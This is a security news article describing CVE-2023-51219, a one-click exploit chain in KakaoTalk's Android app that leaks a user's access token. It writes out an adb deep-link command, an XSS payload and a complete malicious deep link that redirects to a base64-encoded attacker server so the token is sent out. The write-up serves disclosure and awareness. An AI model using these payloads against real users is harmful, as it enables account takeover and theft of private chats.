Tuesday, November 12, 2024
HomeAndroid1-Click Exploit In Kakaotalk's Android App Allows Arbitrary Code Execution

1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution

Published on

Malware protection

KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.

It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”. 

Further, this End-to-end encryption is not supported in group messaging or voice calling.

- Advertisement - SIEM as a Service

However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header. 

In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:

  • It can be started with a Deep link (adb shell am start kakaotalk://buy)
  • Javascript enabled
  • supports Intent:// that can be used to send data to other non-exported app components via JS
  • No sanitization
  • Leaks an Authorization HTTP header that can be done through Netcat listener in a terminal window and running the $ adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.

To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.

There was one endpoint identified that was vulnerable to redirection to any kakao domain.

To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.

This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>. 

So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.

Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages. 

Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.

Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

10 Best DNS Management Tools – 2025

Best DNS Management Tools play a crucial role in efficiently managing domain names and...

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Tor Network Suffers IP Spoofing Attack Via Non-Exit Relays

In late October 2024, a coordinated IP spoofing attack targeted the Tor network, prompting...